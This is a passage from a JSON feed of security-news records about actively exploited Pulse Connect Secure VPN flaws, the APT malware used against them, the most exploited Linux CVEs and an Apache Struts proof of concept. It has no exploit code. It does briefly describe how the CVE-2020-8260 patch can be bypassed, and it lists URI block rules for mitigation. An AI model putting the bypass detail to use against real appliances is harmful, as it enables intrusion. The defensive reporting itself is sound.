While further checks were added to validate the TAR file to prevent exploitation of CVE-2020-8260, additional variant and patch analysis revealed that it's possible to exploit the same extraction vulnerability in the part of the source code that handles profiler device databases, effectively getting around the mitigations put in place.\n\n\"Whilst this issue was patched by adding validation to extracted files, this validation does not apply to archives with the 'profiler' type,\" Warren said. \"Therefore, by simply modifying the original CVE-2020-8260 exploit to change the archive type to 'profiler', the patch can be bypassed, and code execution achieved.\"\n\nIt's worth noting that CVE-2020-8260 was one among the four Pulse Secure flaws that were [actively exploited by threat actors](<https://thehackernews.com/2021/04/warning-hackers-exploit-unpatched-pulse.html>) earlier this April to stage a series of intrusions targeting defense, government, and financial entities in the U.S. and beyond in a bid to circumvent multi-factor authentication protections and breach enterprise networks. Given the possibility of real-world exploitation, it's highly recommended to upgrade to Pulse Connect Secure (PCS) 9.1R12, or later.\n\n\"A rigorous code review is just one of the steps we are taking to further bolster our security and protect our customers,\" Spicer [said](<https://blog.pulsesecure.net/improved-security-testing-procedures/>). \"For instance, we are also further expanding our existing internal product security resources to ramp up the pace and intensity of testing on existing products as well as those of companies or systems that we integrate into Ivanti.\"\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-09T09:00:00", "type": "thn", "title": "Pulse Secure VPNs Get New Urgent Update for Poorly Patched Critical Flaw", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8260", "CVE-2021-2293", "CVE-2021-22937"], "modified": "2021-08-10T07:48:11", "id": "THN:9FB8DE3BF545932321335F2C525A4A36", "href": "https://thehackernews.com/2021/08/pulse-secure-vpns-get-new-urgent-update.html", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:19", "description": "If Pulse Connect Secure gateway is part of your organization network, you need to be aware of a newly discovered critical zero-day authentication bypass vulnerability 
(CVE-2021-22893) that is currently being exploited in the wild and for which there is no patch available yet.\n\nAt least two threat actors have been behind a series of intrusions targeting defense, government, and financial organizations in the U.S. and elsewhere by leveraging critical vulnerabilities in Pulse Secure VPN devices to circumvent multi-factor authentication protections and breach enterprise networks.\n\n\"A combination of prior vulnerabilities and a previously unknown vulnerability discovered in April 2021, [CVE-2021-22893](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/>), are responsible for the initial infection vector,\" cybersecurity firm FireEye [said](<https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html>) on Tuesday, identifying 12 malware families associated with the exploitation of Pulse Secure VPN appliances.\n\nThe company is also tracking the activity under two threat clusters UNC2630 and UNC2717 (\"[UNC](<https://www.fireeye.com/blog/products-and-services/2020/12/how-mandiant-tracks-uncategorized-threat-actors.html>)\" for Uncategorized) \u2014 the former linked to a break-in of U.S. 
Defense Industrial Base (DIB) networks, while the latter was found targeting a European organization in March 2021 \u2014 with the investigation attributing UNC2630 to operatives working on behalf of the Chinese government, in addition to suggesting possible ties to another espionage actor [APT5](<https://malpedia.caad.fkie.fraunhofer.de/actor/apt5>) based on \"strong similarities to historic intrusions dating back to 2014 and 2015.\"\n\nAttacks staged by UNC2630 are believed to have commenced as early as August 2020, before they expanded in October 2020, when UNC2717 began repurposing the same flaws to install custom malware on the networks of government agencies in Europe and the U.S. The incidents continued until March 2021, according to FireEye.\n\nThe list of malware families is as follows -\n\n * **UNC2630** \\- SLOWPULSE, RADIALPULSE, THINBLOOD, ATRIUM, PACEMAKER, SLIGHTPULSE, and PULSECHECK\n * **UNC2717** \\- HARDPULSE, QUIETPULSE, and PULSEJUMP\n\nTwo additional malware strains, STEADYPULSE and LOCKPICK, deployed during the intrusions have not been linked to a specific group, citing lack of evidence.\n\nBy exploiting multiple Pulse Secure VPN weaknesses ([CVE-2019-11510](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>), [CVE-2020-8260](<https://nvd.nist.gov/vuln/detail/CVE-2020-8260>), [CVE-2020-8243](<https://nvd.nist.gov/vuln/detail/CVE-2020-8243>), and CVE-2021-22893), UNC2630 is said to have harvested login credentials, using them to move laterally into the affected environments. 
In order to maintain persistence on the compromised networks, the actor utilized legitimate, but modified, Pulse Secure binaries and scripts to enable arbitrary command execution and inject web shells capable of carrying out file operations and running malicious code.\n\nIvanti, the company behind the Pulse Secure VPN, has released [temporary mitigations](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>) to address the arbitrary file execution vulnerability ([CVE-2021-22893](<https://kb.cert.org/vuls/id/213092>), CVSS score: 10), while a fix for the issue is expected to be in place by early May. The Utah-based company acknowledged that the new flaw impacted a \"[very limited number of customers](<https://blog.pulsesecure.net/pulse-connect-secure-security-update/>),\" adding it has released a [Pulse Connect Secure Integrity Tool](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>) for customers to check for signs of compromise.\n\nPulse Secure customers are recommended to upgrade to PCS Server version 9.1R.11.4 when it becomes available.\n\nNews of compromises affecting government agencies, critical infrastructure entities, and other private sector organizations comes a week after the U.S. government [released an advisory](<https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html>), warning businesses of active exploitation of five publicly known vulnerabilities by the Russian Foreign Intelligence Service (SVR), including CVE-2019-11510, to gain initial footholds into victim devices and networks.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-21T04:20:00", "type": "thn", "title": "WARNING: Hackers Exploit Unpatched Pulse Secure 0-Day to Breach Organizations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-22893"], "modified": "2021-04-21T17:42:28", "id": "THN:AE2E46F59043F97BE70DB77C163186E6", "href": "https://thehackernews.com/2021/04/warning-hackers-exploit-unpatched-pulse.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:24", "description": "Close to 14 million Linux-based systems are directly exposed to the Internet, making them a lucrative target for an array of real-world attacks that could result in the 
deployment of malicious web shells, coin miners, ransomware, and other trojans.\n\nThat's according to an in-depth look at the Linux threat landscape published by U.S.-Japanese cybersecurity firm [Trend Micro](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/linux-threat-report-2021-1h-linux-threats-in-the-cloud-and-security-recommendations>), detailing the top threats and vulnerabilities affecting the operating system in the first half of 2021, based on data amassed from honeypots, sensors, and anonymized telemetry.\n\nThe company, which detected nearly 15 million malware events aimed at Linux-based cloud environments, found coin miners and ransomware to make up 54% of all malware, with web shells accounting for a 29% share.\n\nIn addition, by dissecting over 50 million events reported from 100,000 unique Linux hosts during the same time period, the researchers found 15 different security weaknesses that are known to be actively exploited in the wild or have a proof of concept (PoC) \u2014\n\n * [**CVE-2017-5638**](<https://nvd.nist.gov/vuln/detail/CVE-2017-5638>) (CVSS score: 10.0) - Apache Struts 2 remote code execution (RCE) vulnerability\n * [**CVE-2017-9805**](<https://nvd.nist.gov/vuln/detail/CVE-2017-9805>) (CVSS score: 8.1) - Apache Struts 2 REST plugin XStream RCE vulnerability\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) - Drupal Core RCE vulnerability\n * [**CVE-2020-14750**](<https://nvd.nist.gov/vuln/detail/CVE-2020-14750>) (CVSS score: 9.8) - Oracle WebLogic Server RCE vulnerability\n * [**CVE-2020-25213**](<https://nvd.nist.gov/vuln/detail/CVE-2020-25213>) (CVSS score: 10.0) - WordPress File Manager (wp-file-manager) plugin RCE vulnerability\n * [**CVE-2020-17496**](<https://nvd.nist.gov/vuln/detail/CVE-2020-17496>) (CVSS score: 9.8) - vBulletin 'subwidgetConfig' unauthenticated RCE vulnerability\n * [**CVE-2020-11651**](<https://nvd.nist.gov/vuln/detail/CVE-2020-11651>) 
(CVSS score: 9.8) - SaltStack Salt authorization weakness vulnerability\n * [**CVE-2017-12611**](<https://nvd.nist.gov/vuln/detail/CVE-2017-12611>) (CVSS score: 9.8) - Apache Struts OGNL expression RCE vulnerability\n * [**CVE-2017-7657**](<https://nvd.nist.gov/vuln/detail/CVE-2017-7657>) (CVSS score: 9.8) - Eclipse Jetty chunk length parsing integer overflow vulnerability\n * [**CVE-2021-29441**](<https://nvd.nist.gov/vuln/detail/CVE-2021-29441>) (CVSS score: 9.8) - Alibaba Nacos AuthFilter authentication bypass vulnerability\n * [**CVE-2020-14179**](<https://nvd.nist.gov/vuln/detail/CVE-2020-14179>) (CVSS score: 5.3) - Atlassian Jira information disclosure vulnerability\n * [**CVE-2013-4547**](<https://nvd.nist.gov/vuln/detail/CVE-2013-4547>) (CVSS score: 8.0) - Nginx crafted URI string handling access restriction bypass vulnerability\n * [**CVE-2019-0230**](<https://nvd.nist.gov/vuln/detail/CVE-2019-0230>) (CVSS score: 9.8) - Apache Struts 2 RCE vulnerability\n * [**CVE-2018-11776**](<https://nvd.nist.gov/vuln/detail/CVE-2018-11776>) (CVSS score: 8.1) - Apache Struts OGNL expression RCE vulnerability\n * [**CVE-2020-7961**](<https://nvd.nist.gov/vuln/detail/CVE-2020-7961>) (CVSS score: 9.8) - Liferay Portal untrusted deserialization vulnerability\n\nEven more troubling, the 15 most commonly used Docker images on the official Docker Hub repository have been revealed to harbor hundreds of vulnerabilities spanning across python, node, wordpress, golang, nginx, postgres, influxdb, httpd, mysql, debian, memcached, redis, mongo, centos, and rabbitmq, underscoring the need to [secure 
containers](<https://www.trendmicro.com/vinfo/us/security/news/security-technology/container-security-examining-potential-threats-to-the-container-environment>) from a wide range of potential threats at each stage of the development pipeline.\n\n\"Users and organizations should always apply security best practices, which include utilizing the security by design approach, deploying multilayered virtual patching or vulnerability shielding, employing the principle of least privilege, and adhering to the shared responsibility model,\" the researchers concluded.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-08-23T13:27:00", "type": "thn", "title": "Top 15 Vulnerabilities Attackers Exploited Millions of Times to Hack Linux Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4547", "CVE-2017-12611", "CVE-2017-5638", "CVE-2017-7657", 
"CVE-2017-9805", "CVE-2018-11776", "CVE-2018-7600", "CVE-2019-0230", "CVE-2020-11651", "CVE-2020-14179", "CVE-2020-14750", "CVE-2020-17496", "CVE-2020-25213", "CVE-2020-7961", "CVE-2021-29441"], "modified": "2021-08-23T13:27:54", "id": "THN:7FD924637D99697D78D53283817508DA", "href": "https://thehackernews.com/2021/08/top-15-vulnerabilities-attackers.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-04-21T15:44:32", "description": "A critical zero-day security vulnerability in Pulse Secure VPN devices has been exploited by nation-state actors to launch cyberattacks against U.S. defense, finance and government targets, as well as victims in Europe, researchers said.\n\nThe flaw, tracked as CVE-2021-22893, allows remote code-execution (RCE) and is being used in the wild to gain administrator-level access to the appliances, according to Ivanti research. 
Pulse Secure said that the zero-day will be patched in early May; but in the meantime, the company worked with Ivanti (its parent company) to release both mitigations and the [Pulse Connect Secure Integrity Tool](<https://kb.pulsesecure.net/pkb_mobile#article/l:en_US/KB44755/s>), to help determine if systems have been impacted.\n\n\u201cThe investigation shows ongoing attempts to exploit four issues: The substantial bulk of these issues involve three vulnerabilities that were patched in 2019 and 2020: [Security Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>) (CVE-2019-11510), [Security Advisory SA44588](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44588>) (CVE-2020-8243) and [Security Advisory SA44601](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601>) (CVE-2020-8260),\u201d according to a Pulse Secure statement provided to Threatpost. \u201cThe new issue, discovered this month, impacted a very limited number of customers.\u201d\n\n## **CVE-2021-22893: A Zero-Day in Pulse Connect Secure VPNs**\n\nThe newly discovered critical security hole is rated 10 out of 10 on the CVSS vulnerability-rating scale. It\u2019s an authentication bypass vulnerability that can allow an unauthenticated user to perform RCE on the Pulse Connect Secure gateway. It \u201cposes a significant risk to your deployment,\u201d according to the advisory, [issued Tuesday](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784>).\n\n\u201cThe ongoing COVID-19 crisis resulted in an overnight shift to remote work culture, and VPNs played a critical role to make this possible,\u201d Bharat Jogi, senior manager of vulnerability and threat research at Qualys, said via email. 
\u201cVPNs have become a prime target for cybercriminals and over the past few months.\u201d\n\n\u201cThe Pulse Connect Secure vulnerability with CVE-2021-22893\u2026can be exploited without any user interaction,\u201d he added.\n\nThe mitigations involve importing a file called \u201cWorkaround-2104.xml,\u201d available on the advisory page. It disables the Windows File Share Browser and Pulse Secure Collaboration features on the appliance.\n\nUsers can also use the blacklisting feature to block URL-based attacks, the firm noted, by blocking the following URIs:\n\n * ^/+dana/+meeting\n * ^/+dana/+fb/+smb\n * ^/+dana-cached/+fb/+smb\n * ^/+dana-ws/+namedusers\n * ^/+dana-ws/+metric\n\n\u201cThe Pulse Connect Secure (PCS) team is in contact with a limited number of customers who have experienced evidence of exploit behavior on their PCS appliances,\u201d according to Pulse Secure. \u201cThe PCS team has provided remediation guidance to these customers directly.\u201d\n\nAccording to tandem research from Mandiant, this and the other bugs are at the center of a flurry of activity by different threat actors, involving 12 different malware families overall. The malware is used for authentication bypass, for establishing backdoor access to the VPN devices, and for lateral movement. Two specific advanced persistent threat (APT) groups, UNC2630 and UNC2717, are particularly involved, researchers said.\n\n## **UNC2630 Cyber-Activity: Links to China**\n\n\u201cWe observed UNC2630 harvesting credentials from various Pulse Secure VPN login flows, which ultimately allowed the actor to use legitimate account credentials to move laterally into the affected environments,\u201d according to Mandiant, in a [Tuesday posting](<https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html>). 
\u201cIn order to maintain persistence to the compromised networks, the actor utilized legitimate, but modified, Pulse Secure binaries and scripts on the VPN appliance.\u201d\n\nThe firm tracks those tools as the following:\n\n * **SlowPulse:** Trojanized shared objects with malicious code to log credentials and bypass authentication flows within the legitimate Pulse Secure shared object libdsplibs.so, including multifactor authentication requirements.\n * **RadialPulse and PulseCheck:** Web shells injected into legitimate, internet-accessible Pulse Secure VPN appliance administrative web pages.\n * **ThinBlood:** A utility used to clear relevant log files.\n * **Other capabilities:** Toggling the filesystem between Read-Only and Read-Write modes to allow for file modification on a typically Read-Only filesystem; the ability to maintain persistence across VPN appliance general upgrades that are performed by the administrator; and the ability to unpatch modified files and delete utilities and scripts after use to evade detection.\n\nUNC2630 targeted U.S. defense-sector companies as early as last August, Mandiant noted. It added that the activity could be state-sponsored, likely backed by China.\n\n\u201cWe suspect UNC2630 operates on behalf of the Chinese government and may have ties to APT5,\u201d according to the analysis. \u201cUNC2630\u2019s combination of infrastructure, tools, and on-network behavior appear to be unique, and we have not observed them during any other campaigns or at any other engagement. 
Despite these new tools and infrastructure, Mandiant analysts noted strong similarities to historic intrusions dating back to 2014 and 2015 and conducted by Chinese espionage actor APT5.\u201d\n\nAPT5 consistently targets defense and technology companies in Asia, Europe and the U.S., Mandiant noted.\n\n\u201c[It] has shown significant interest in compromising networking devices and manipulating the underlying software which supports these appliances,\u201d Mandiant researchers said. \u201cAPT5 persistently targets high value corporate networks and often re-compromises networks over many years. Their primary targets appear to be aerospace and defense companies located in the U.S., Europe, and Asia. Secondary targets (used to facilitate access to their primary targets) include network appliance manufacturers and software companies usually located in the U.S.\u201d\n\n## **The UNC2717 APT Connection**\n\nAs for UNC2717, Mandiant linked Pulse Secure zero-day activity back to the APT in a separate incident in March, targeted against an unnamed European organization. UNC2717 was also seen targeting global government agencies between October and March.\n\nSo far, there\u2019s not enough evidence about UNC2717 to determine government sponsorship or suspected affiliation with any known APT group, Mandiant said.\n\nThe tools used by this group include HardPulse, which is a web shell; PulseJump, used for credential harvesting; and RadialPulse. The firm also observed a new malware family that it calls LockPick, a trojanized OpenSSL library file that appears to weaken encryption for communications used by the VPN appliances.\n\nAll of the malware families in use in the campaigns appear to be loosely related, according to Mandiant.\n\n\u201cAlthough we did not observe PulseJump or HardPulse used by UNC2630 against U.S. 
[defense] companies, these malware families have shared characteristics and serve similar purposes to other code families used by UNC2630,\u201d researchers said.\n\nThey added, \u201cMandiant cannot associate all the code families described in this report to UNC2630 or UNC2717. We also note the possibility that one or more related groups is responsible for the development and dissemination of these different tools across loosely connected APT actors.\u201d\n\n## **Pulse Secure: A Favorite Target for APTs**\n\nPulse Secure VPNs continue to be a hot target for nation-state actors. Last week, [the FBI warned](<https://threatpost.com/nsa-security-bugs-active-nation-state-cyberattack/165446/>) that a known arbitrary file-read Pulse Secure bug (CVE-2019-11510) was part of five vulnerabilities under attack by the Russia-linked group known as APT29 (a.k.a. Cozy Bear or The Dukes). APT29 is conducting \u201cwidespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials to allow further access,\u201d according to the Feds.\n\nMeanwhile, earlier in April, the Department of Homeland Security (DHS) urged companies that use Pulse Secure VPNs to change their passwords for Active Directory accounts, because in many cases, attackers have already exploited CVE-2019-11510 to hoover up victims\u2019 credentials \u2013 and now are using those credentials to move laterally through organizations, [DHS warned](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>).\n\nAnd last fall, the Cybersecurity and Infrastructure Security Agency (CISA) said that a federal agency had suffered a successful espionage-related cyberattack that led to a backdoor and multistage malware being dropped on its network. 
Once again, [CVE-2019-11510 was in play](<https://threatpost.com/feds-cyberattack-data-stolen/159541/>), used to gain access to employees\u2019 legitimate Microsoft Office 365 log-in credentials and sign into an agency computer remotely.\n\n\u201cAlmost without fail, the common thread with any APT is the exploitation of known vulnerabilities both new and old,\u201d Yaniv Bar-Dayan, CEO and co-founder at Vulcan Cyber, said via email. \u201cMalicious activity, whether using a supply-chain vector or a VPN authentication bypass, is thwarted by good cyber-hygiene practices and serious blue teaming. Vulnerability management, or more importantly vulnerability remediation, is a cybersecurity dirty job that is under-resourced and underappreciated and businesses are paying the price.\u201d\n
", "cvss3": {}, "published": "2021-04-21T15:35:37", "type": "threatpost", "title": "Pulse Secure Critical Zero-Day Security Bug Under Active Exploit", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-22893"], "modified": "2021-04-21T15:35:37", "id": "THREATPOST:2BD1A92D071EE3E52CB5EA7DD865F60A", "href": "https://threatpost.com/pulse-secure-critical-zero-day-active-exploit/165523/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:21:14", "description": "Proof-of-concept exploit code surfaced on GitHub on Friday, raising the stakes on two existing Apache Struts 2 bugs that allow for remote code-execution and denial-of-service attacks on vulnerable installations.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) issued an alert regarding the two bugs, tracked as [CVE-2019-0230](<https://cwiki.apache.org/confluence/display/WW/S2-059>) and [CVE-2019-0233](<https://cwiki.apache.org/confluence/display/WW/S2-060>). Impacted are Apache Struts versions 2.0.0 through 2.5.20. Remediation includes upgrading to Struts 2.5.22, according to the Apache Struts Security Team.\n\nStruts 2 is an open-source framework and library popular with developers and companies when creating Java-based applications. Both of the exploitable vulnerabilities in question were fixed last November. 
\n\nResearchers have warned of outdated installations of Apache Struts 2 and that [if left unpatched](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>) they can open the door to more critical holes similar to a bug at the root of the [massive Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)).\n\n## **PoC Released to GitHub**\n\nThe proof-of-concept (PoC) [released this week](<https://github.com/cellanu/cve-2019-0230>) raises the greatest concern with CVE-2019-0230, originally rated important when first uncovered by Matthias Kaiser at Apple Information Security. The bug is triggered when a threat actor sends malicious Object-Graph Navigation Language (OGNL) expressions that can then open the door to a remote code-execution attack, according to the security bulletin. OGNL is an expression language for Java that can let attackers access data objects, and then use them to create and inject server-side code.\n\n\u201cSuccessful exploitation of the most severe of these vulnerabilities (CVE-2019-0230) could allow for remote code-execution in the context of the affected application. Depending on the privileges associated with the application, an attacker could install programs; view, change or delete data; or create new accounts with full user rights,\u201d according to a bulletin issued Friday by the Multi-State Information Sharing & Analysis Center at the Center for Internet Security.\n\nWhile the PoC attack and exploit posted to GitHub targets CVE-2019-0230, the Apache Struts Security Team also urged users to patch for the DoS bug (CVE-2019-0233). 
The vulnerability affects the write permissions of file directories, which could lead to conditions ripe for a DoS attack.\n\nAccording to the Apache Struts 2 Wiki description of the bug, this flaw can be triggered with a file upload to a Struts Action that exposes the file.\n\n\u201cAn attacker may manipulate the request such that the working copy of the uploaded file is set to read-only. As a result, subsequent actions on the file will fail with an error. It might also be possible to set the Servlet container\u2019s temp directory to read only, such that subsequent upload actions will fail,\u201d [according to the description](<https://cwiki.apache.org/confluence/display/WW/S2-060>).\n\nThe Apache security bulletin recommends upgrading to the most recent version of Apache Struts. It also suggests security teams verify no unauthorized system modifications have occurred on the system before applying the patch, and that they run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack.\n
", "cvss3": {}, "published": "2020-08-14T21:20:01", "type": "threatpost", "title": "PoC Exploit Targeting Apache Struts Surfaces on GitHub", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2019-0230", "CVE-2019-0233", "CVE-2020-5135"], "modified": "2020-08-14T21:20:01", "id": "THREATPOST:0DD2AEA1738F9B6612B1C845F3BC949F", "href": "https://threatpost.com/poc-exploit-github-apache-struts/158393/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2021-05-04T12:27:56", "description": "Pulse Secure has [alerted customers](<https://blog.pulsesecure.net/pulse-connect-secure-security-update/>) to the existence of an exploitable chain of attack against its Pulse Connect Secure (PCS) appliances. PCS provides Virtual Private Network (VPN) facilities to businesses, which use them to prevent unauthorized access to their networks and services.\n\nCybersecurity sleuths Mandiant report that they are tracking "12 malware families associated with the exploitation of Pulse Secure VPN devices" operated by groups using a set of related techniques to bypass both single and multi-factor authentication. Most of the problems discovered by Pulse Secure and Mandiant involve three vulnerabilities that were patched in 2019 and 2020. But there is also a very serious new issue that it says impacts a very limited number of customers.\n\n### The old vulnerabilities\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). 
The patched vulnerabilities are listed as:\n\n * [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability. We [wrote](<https://blog.malwarebytes.com/business-2/2019/10/pulse-vpn-patched-their-vulnerability-but-businesses-are-trailing-behind/>) about the apparent reluctance to patch for this vulnerability in 2019.\n * [CVE-2020-8243](<https://nvd.nist.gov/vuln/detail/CVE-2020-8243>) a vulnerability in the Pulse Connect Secure < 9.1R8.2 admin web interface could allow an authenticated attacker to upload a custom template to perform an arbitrary code execution.\n * [CVE-2020-8260](<https://nvd.nist.gov/vuln/detail/CVE-2020-8260>) a vulnerability in the Pulse Connect Secure < 9.1R9 admin web interface could allow an authenticated attacker to perform an arbitrary code execution using uncontrolled gzip extraction.\n\nThe obvious advice here is to review the Pulse advisories for these vulnerabilities and follow the recommended guidance, which includes changing all passwords in the environments that are impacted.\n\n### The new vulnerability\n\nThe new vulnerability (CVE-2021-22893) is a Remote Code Execution (RCE) vulnerability with a CVSS score of 10\u2014the maximum\u2014and a Critical rating. According to [the Pulse advisory](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784>):\n\n> [The vulnerability] includes an authentication by-pass vulnerability that can allow an unauthenticated user to perform remote arbitrary file execution on the Pulse Connect Secure gateway. This vulnerability has a critical CVSS score and poses a significant risk to your deployment.\n\nThere is no patch for it yet (it is expected to be patched in early May), so system administrators will need to mitigate for the problem for now, rather than simply fixing it. 
Please don't wait for the patch.\n\n### Mitigation requires a workaround\n\nAccording to Pulse Secure, until the patch is available CVE-2021-22893 can be mitigated by importing a workaround file. More details can be found in the company's [Security Advisory 44784](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784>). Reportedly, the workaround disables Pulse Collaboration, a feature that allows users to schedule and hold online meetings between both Connect Secure users and non-Connect Secure users. The workaround also disables the Windows File Share Browser that allows users to browse network file shares.\n\n### Targets\n\nThe Pulse Connect Secure vulnerabilities, including CVE-2021-22893, have been used to target government, defense and financial organizations around the world, but mainly in the US. According to some articles the threat actors are linked to China. The identified threat actors were found to be harvesting account credentials, very likely in order to perform lateral movement within compromised organizations' environments. Researchers have also observed threat actors deploying modified Pulse Connect Secure files and scripts in order to maintain persistence. These modified scripts on the Pulse Secure system are reported to have allowed the malware to survive software updates and factory resets.\n\n### Threat analysis\n\nFireEye's Mandiant was involved in the research into these vulnerabilities. It has posted an elaborate analysis of the related malware, which it has dubbed SlowPulse. According to Mandiant, the malware and its variants are "applied as modifications to legitimate Pulse Secure files to bypass or log credentials in the authentication flows that exist within the legitimate Pulse Secure shared object libdsplibs.so". In their [blogpost](<https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html>) they discuss four variants. 
Interested parties can also find technical details and detections there.\n\n### Networking devices\n\nState-sponsored cyber-attacks are often more about espionage than about monetary gain, with the exception of sabotage against an enemy state. A big part of the espionage is getting hold of the login credentials of those who have access to interesting secret information. Breaking into network devices in a way that can be used to extract login credentials is an important strategy in this secret conflict. Keep in mind that attribution is always hard and tricky. You may end up reaching the conclusion the attackers wanted you to reach. Given the targets and the methodology, however, it makes sense in this case to look first at state-sponsored threat actors.\n\n### Update May 4th\n\nThe Pulse Secure team released a security update to address the issue outlined in [Security Advisory SA44784 (CVE-2021-22893)](<https://kb.pulsesecure.net/pkb_mobile#article/l:en_US/SA44784/s>) impacting the Pulse Connect Secure appliance. It is recommended that customers act urgently to apply the update to ensure they are protected. On that note, Pulse Secure also recommends that customers use the Pulse Security Integrity Checker Tool, a tool for customers to identify malicious activity on their systems, and that they continue to apply and follow recommended guidance for all available security patches.\n\nThe post [Take action! 
